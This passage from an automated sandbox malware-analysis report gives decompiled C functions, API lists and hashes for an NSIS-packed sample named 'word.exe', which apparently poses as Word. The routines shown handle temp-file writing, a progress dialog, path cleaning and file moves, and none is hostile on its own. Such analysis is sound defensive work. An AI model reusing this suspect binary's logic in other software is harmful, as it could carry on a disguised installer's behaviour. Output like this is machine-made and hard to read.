								E0040578C( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
								_t59 = _t60 +  *(_t61 - 0x40);
							}
							GlobalFree( *(_t61 - 0x30));
						}
						WriteFile( *(_t61 + 8), _t54,  *(_t61 - 0x2c), _t61 - 0x34, _t49);
						GlobalFree(_t54);
						 *((intOrPtr*)(_t61 - 0x3c)) = E00402F71(_t51, 0xffffffff,  *(_t61 + 8), _t49, _t49);
					}
					CloseHandle( *(_t61 + 8));
					_t56 = 0x4097f8;
				}
				_t52 = 0xfffffff3;
				if( *((intOrPtr*)(_t61 - 0x3c)) < _t49) {
					_t52 = 0xffffffef;
					DeleteFileA(_t56);
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t52);
				E00401423();
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}














                                                          0x004026df
                                                          0x004026e0
                                                          0x004026ec
                                                          0x004026ef
                                                          0x004026f6
                                                          0x004026f7
                                                          0x0040271c
                                                          0x00402721
                                                          0x004026f9
                                                          0x004026fe
                                                          0x004026ff
                                                          0x004026ff
                                                          0x00402727
                                                          0x0040272d
                                                          0x0040273a
                                                          0x00402742
                                                          0x00402745
                                                          0x0040274b
                                                          0x00402759
                                                          0x0040275e
                                                          0x00402762
                                                          0x00402765
                                                          0x0040276e
                                                          0x0040277a
                                                          0x0040277e
                                                          0x00402781
                                                          0x0040278b
                                                          0x004027aa
                                                          0x00402792
                                                          0x00402797
                                                          0x0040279f
                                                          0x004027a2
                                                          0x004027a7
                                                          0x004027a7
                                                          0x004027b1
                                                          0x004027b1
                                                          0x004027c3
                                                          0x004027ca
                                                          0x004027dc
                                                          0x004027dc
                                                          0x004027e2
                                                          0x004027e8
                                                          0x004027e8
                                                          0x004027f2
                                                          0x004027f3
                                                          0x004027f7
                                                          0x004027f9
                                                          0x004027ff
                                                          0x004027ff
                                                          0x00402806
                                                          0x004021ba
                                                          0x0040291d
                                                          0x00402929

                                                          APIs
                                                          • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040271C
                                                          • GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp,40000000,00000002,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040275C
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402778
                                                          • GlobalFree.KERNEL32(?), ref: 004027B1
                                                          • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027C3
                                                          • GlobalFree.KERNEL32(00000000), ref: 004027CA
                                                          • CloseHandle.KERNEL32(?), ref: 004027E2
                                                          • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,40000000,00000002,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 004027F9
                                                            • Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,00423720,NSIS Error), ref: 00405B01
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                                                          • API String ID: 3508600917-811135260
                                                          • Opcode ID: d2d92c82f11ecaaef4ef029b20069be8af098a3639b696ed34d4ec1f43b449d7
                                                          • Instruction ID: fcc06673606a62174d5ec44ae6416698489d1e6bc37419cb4e18d2f49fa452d4
                                                          • Opcode Fuzzy Hash: d2d92c82f11ecaaef4ef029b20069be8af098a3639b696ed34d4ec1f43b449d7
                                                          • Instruction Fuzzy Hash: 8A317A72C00524BBCB116FA5CD89DAF7A78EF08364B10823AF924772D1CB7C5C019BA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402BCA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65timeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00402BCA(struct HWND__* _a4, intOrPtr _a8, CHAR* _a12) {
				intOrPtr _t5;
				int _t7;
				CHAR* _t9;
				int _t18;
				int _t19;
				struct HWND__* _t23;
				void* _t24;

				_t5 = _a8;
				_t23 = _a4;
				if(_t5 == 0x110) {
					SetTimer(_t23, 1, 0xfa, 0);
					 *0x40b000 = _a12;
					_t5 = 0x113;
				}
				if(_t5 == 0x113) {
					_t19 =  *0x4170d0; // 0x0
					_t7 =  *0x41f0e0;
					if(_t19 >= _t7) {
						_t19 = _t7;
					}
					_t18 = MulDiv(_t19, 0x64, _t7);
					_t9 =  *0x40b000; // 0x0
					if(_t9 != 0) {
						wsprintfA(0x417090, _t9, _t18);
						_t24 = _t24 + 0xc;
						SetWindowTextA(_t23, 0x417090);
						SetDlgItemTextA(_t23, 0x406, 0x417090);
						ShowWindow(_t23, 5);
					}
					if(( *0x409250 & 0x00000001) != 0) {
						wsprintfA(0x417090, "... %d%%", _t18);
						E00404E9F(0, 0x417090);
					}
				}
				return 0;
			}










                                                          0x00402bca
                                                          0x00402bd0
                                                          0x00402be0
                                                          0x00402bec
                                                          0x00402bf6
                                                          0x00402bfb
                                                          0x00402bfb
                                                          0x00402bff
                                                          0x00402c01
                                                          0x00402c07
                                                          0x00402c0e
                                                          0x00402c10
                                                          0x00402c10
                                                          0x00402c22
                                                          0x00402c24
                                                          0x00402c30
                                                          0x00402c35
                                                          0x00402c37
                                                          0x00402c3c
                                                          0x00402c49
                                                          0x00402c51
                                                          0x00402c51
                                                          0x00402c5e
                                                          0x00402c67
                                                          0x00402c6f
                                                          0x00402c6f
                                                          0x00402c5e
                                                          0x00402c7a

                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BEC
                                                          • MulDiv.KERNEL32 ref: 00402C16
                                                          • wsprintfA.USER32 ref: 00402C35
                                                          • SetWindowTextA.USER32(?,00417090), ref: 00402C3C
                                                          • SetDlgItemTextA.USER32(?,00000406,00417090), ref: 00402C49
                                                          • ShowWindow.USER32(?,00000005), ref: 00402C51
                                                          • wsprintfA.USER32 ref: 00402C67
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: TextWindowwsprintf$ItemShowTimer
                                                          • String ID: ... %d%%
                                                          • API String ID: 2110197580-2449383134
                                                          • Opcode ID: be9472393d59c88d12cd395d65e6edb92999041bf15d4c00958e30b0f553495c
                                                          • Instruction ID: 99e2debb18c7311ff8eca1142aa4f476a7479ee74c8687a77fe961922a259f3d
                                                          • Opcode Fuzzy Hash: be9472393d59c88d12cd395d65e6edb92999041bf15d4c00958e30b0f553495c
                                                          • Instruction Fuzzy Hash: FC1186347443197BE2249B249D49FAB779CEB49754F004036FE49F63D1D7B8AC4086AD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405D03 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405D03(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405654(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405612("*?|<>/\":", _t5))) == 0) {
							E0040578C(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                          0x00405d05
                                                          0x00405d0d
                                                          0x00405d21
                                                          0x00405d21
                                                          0x00405d27
                                                          0x00405d34
                                                          0x00405d34
                                                          0x00405d35
                                                          0x00405d37
                                                          0x00405d3b
                                                          0x00405d3d
                                                          0x00405d46
                                                          0x00405d48
                                                          0x00405d62
                                                          0x00405d6a
                                                          0x00405d6a
                                                          0x00405d6f
                                                          0x00405d71
                                                          0x00405d73
                                                          0x00405d77
                                                          0x00405d78
                                                          0x00405d7b
                                                          0x00405d83
                                                          0x00405d85
                                                          0x00405d89
                                                          0x00000000
                                                          0x00000000
                                                          0x00405d8f
                                                          0x00405d94
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405d94
                                                          0x00405d99

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe
                                                          • API String ID: 589700163-2943609387
                                                          • Opcode ID: b2affafc5d4ebffb713ac08670eb48a808281b6f76aa7d2bb6a067cae95531ec
                                                          • Instruction ID: 5656e1994ff3a00564090885ccfb713e68030b48685137941c4d6139e5eb1e54
                                                          • Opcode Fuzzy Hash: b2affafc5d4ebffb713ac08670eb48a808281b6f76aa7d2bb6a067cae95531ec
                                                          • Instruction Fuzzy Hash: 8E11BF61804E9529FB3216385C48B7B7FD8CF67760F18847BE8C5722C2D67C5C829A6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403F5C Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00403F5C(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                          0x00403f6e
                                                          0x00404002
                                                          0x00000000
                                                          0x00404002
                                                          0x00403f7f
                                                          0x00403f83
                                                          0x00000000
                                                          0x00000000
                                                          0x00403f89
                                                          0x00403f92
                                                          0x00403f95
                                                          0x00403f95
                                                          0x00403f9b
                                                          0x00403fa1
                                                          0x00403fa1
                                                          0x00403fad
                                                          0x00403fb3
                                                          0x00403fba
                                                          0x00403fbd
                                                          0x00403fc0
                                                          0x00403fc2
                                                          0x00403fc2
                                                          0x00403fca
                                                          0x00403fd0
                                                          0x00403fd0
                                                          0x00403fda
                                                          0x00403fdf
                                                          0x00403fe2
                                                          0x00403fe7
                                                          0x00403fea
                                                          0x00403fea
                                                          0x00403ffa
                                                          0x00403ffa
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: daec5bc1bea3a233e319afa84b0aad6d5d19a9a9e6f37679aab0e943fc6803b1
                                                          • Instruction ID: de1dc0ced46b62e01148019097b19380805317e3bca555cad6edf46d623340dd
                                                          • Opcode Fuzzy Hash: daec5bc1bea3a233e319afa84b0aad6d5d19a9a9e6f37679aab0e943fc6803b1
                                                          • Instruction Fuzzy Hash: C6218471904745ABC7219F68DD08B5BBFF8AF01714F048969F995F22E0D738E904CB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00404E9F Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 94%
                                                          			E00404E9F(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423704;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x409250; // 0x6
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405B16(0, _t39, 0x41fd08, 0x41fd08, _a4);
					}
					_t26 = lstrlenA(0x41fd08);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) != 0) {
							_t26 = SetWindowTextA( *0x4236e8, 0x41fd08);
						}
						if((_v12 & 0x00000002) != 0) {
							_v32 = 0x41fd08;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fd08)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fd08, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                          0x00404ea5
                                                          0x00404eb1
                                                          0x00404eb4
                                                          0x00404eba
                                                          0x00404ec6
                                                          0x00404ec9
                                                          0x00404ecc
                                                          0x00404ed2
                                                          0x00404ed2
                                                          0x00404ed8
                                                          0x00404ee0
                                                          0x00404ee3
                                                          0x00404f00
                                                          0x00404f04
                                                          0x00404f0d
                                                          0x00404f0d
                                                          0x00404f17
                                                          0x00404f20
                                                          0x00404f2c
                                                          0x00404f33
                                                          0x00404f37
                                                          0x00404f3a
                                                          0x00404f4d
                                                          0x00404f5b
                                                          0x00404f5b
                                                          0x00404f5f
                                                          0x00404f61
                                                          0x00404f64
                                                          0x00000000
                                                          0x00404f64
                                                          0x00404ee5
                                                          0x00404eed
                                                          0x00404ef5
                                                          0x00404efb
                                                          0x00000000
                                                          0x00404efb
                                                          0x00404ef5
                                                          0x00404ee3
                                                          0x00404f6e

                                                          APIs
                                                          • lstrlenA.KERNEL32(0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1,000000E5), ref: 00404ED8
                                                          • lstrlenA.KERNEL32(?,0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1), ref: 00404EE8
                                                          • lstrcatA.KERNEL32(0041FD08,?,?,0041FD08,?,00000000,?), ref: 00404EFB
                                                          • SetWindowTextA.USER32(0041FD08,0041FD08), ref: 00404F0D
                                                          • SendMessageA.USER32 ref: 00404F33
                                                          • SendMessageA.USER32 ref: 00404F4D
                                                          • SendMessageA.USER32 ref: 00404F5B
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: 7086c7c29e23a29a0d0f5e27e31e816319c7e546315a5373774c460fd8fc0529
                                                          • Instruction ID: 494233230377309a29c5d7fe1475590ec4db79cf9780f6ff06810452207601d7
                                                          • Opcode Fuzzy Hash: 7086c7c29e23a29a0d0f5e27e31e816319c7e546315a5373774c460fd8fc0529
                                                          • Instruction Fuzzy Hash: A021A1B1D00109BBDB119FA5DC859DEBFB9EF85354F14807AFA04B6290C3395E41CB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040164D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54stringfileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 66%
                                                          			E0040164D() {
				int _t18;
				void* _t28;
				void* _t35;

				 *(_t35 + 8) = E00402A85(0xffffffd0);
				 *(_t35 - 8) = E00402A85(0xffffffdf);
				E00405AF4(0x4097f8,  *(_t35 + 8));
				_t18 = lstrlenA( *(_t35 - 8));
				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
					lstrcatA(0x4097f8, 0x40901c);
					lstrcatA(0x4097f8,  *(_t35 - 8));
				}
				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405D9C( *(_t35 + 8)) == 0) {
						 *((intOrPtr*)(_t35 - 4)) = 1;
					} else {
						_push( *(_t35 - 8));
						_push( *(_t35 + 8));
						E00405842();
						_push(0xffffffe4);
						goto L7;
					}
				} else {
					_push(0xffffffe3);
					L7:
					E00401423();
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}






                                                          0x00401656
                                                          0x00401666
                                                          0x0040166a
                                                          0x00401672
                                                          0x00401689
                                                          0x00401691
                                                          0x0040169a
                                                          0x0040169a
                                                          0x004016ad
                                                          0x004016b9
                                                          0x004026bf
                                                          0x004016cf
                                                          0x004016cf
                                                          0x004016d2
                                                          0x004016d5
                                                          0x004016da
                                                          0x00000000
                                                          0x004016da
                                                          0x004016af
                                                          0x004016af
                                                          0x004021ba
                                                          0x004021ba
                                                          0x004021ba
                                                          0x0040291d
                                                          0x00402929

                                                          APIs
                                                            • Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,00423720,NSIS Error), ref: 00405B01
                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp,?,000000DF,000000D0), ref: 00401672
                                                          • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp,?,000000DF,000000D0), ref: 0040167C
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp,0040901C,?,?,C:\Users\user\AppData\Local\Temp,?,000000DF,000000D0), ref: 00401691
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp,?,C:\Users\user\AppData\Local\Temp,0040901C,?,?,C:\Users\user\AppData\Local\Temp,?,000000DF,000000D0), ref: 0040169A
                                                            • Part of subcall function 00405D9C: SetErrorMode.KERNELBASE(00008001,00000000,C:\,?,0040570B,C:\,C:\,00000000,C:\,C:\,?,C:\Users\user\AppData\Roaming\word.exe,755513E0,0040543A,?,755513E0), ref: 00405DAA
                                                            • Part of subcall function 00405D9C: FindFirstFileA.KERNELBASE(?,00422580), ref: 00405DB6
                                                            • Part of subcall function 00405D9C: SetErrorMode.KERNELBASE(00000000), ref: 00405DC0
                                                            • Part of subcall function 00405D9C: FindClose.KERNELBASE(00000000), ref: 00405DC8
                                                            • Part of subcall function 00405842: CloseHandle.KERNEL32(00000000), ref: 0040588F
                                                            • Part of subcall function 00405842: GetShortPathNameA.KERNEL32 ref: 00405898
                                                            • Part of subcall function 00405842: GetShortPathNameA.KERNEL32 ref: 004058B5
                                                            • Part of subcall function 00405842: wsprintfA.USER32 ref: 004058D3
                                                            • Part of subcall function 00405842: GetFileSize.KERNEL32(00000000,00000000,00422138,C0000000,00000004,00422138,?,004055D7,?,00000000,000000F1,?), ref: 0040590E
                                                            • Part of subcall function 00405842: GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040591D
                                                            • Part of subcall function 00405842: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405933
                                                          • MoveFileA.KERNEL32(?,?), ref: 004016A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$CloseErrorFindModeNamePathShortlstrcatlstrlen$AllocFirstGlobalHandleMoveReadSizelstrcpynwsprintf
                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                          • API String ID: 3481313339-2935972921
                                                          • Opcode ID: e75b227483b277d684e81c244fe92116d8ea64f1996e7cc1bca3a7df97b995de
                                                          • Instruction ID: e3d936c7b2e8568bf3afc9a15eb44f15e117e5a8b541455a4ce6046f775872e9
                                                          • Opcode Fuzzy Hash: e75b227483b277d684e81c244fe92116d8ea64f1996e7cc1bca3a7df97b995de
                                                          • Instruction Fuzzy Hash: 9D119E31A04104BBCF01BFA1CD0899E3A72EF40354F14463BF801B61E6DA7D8A929A4D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040476E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0040476E(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                          0x0040477c
                                                          0x00404789
                                                          0x0040478f
                                                          0x004047cd
                                                          0x004047cd
                                                          0x004047dc
                                                          0x004047e3
                                                          0x00000000
                                                          0x004047e5
                                                          0x00404791
                                                          0x004047a0
                                                          0x004047a8
                                                          0x004047ab
                                                          0x004047bd
                                                          0x004047c3
                                                          0x004047ca
                                                          0x00000000
                                                          0x004047ca
                                                          0x00000000

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 9efa1d1d8051c78a9919a677a3bcd6cf9f744936eeccd393b7e464826a275d3e
                                                          • Instruction ID: 9f845b30ae688ed4ef755a08d3db5d44298bc8acb818865eb6350a94e1b176cf
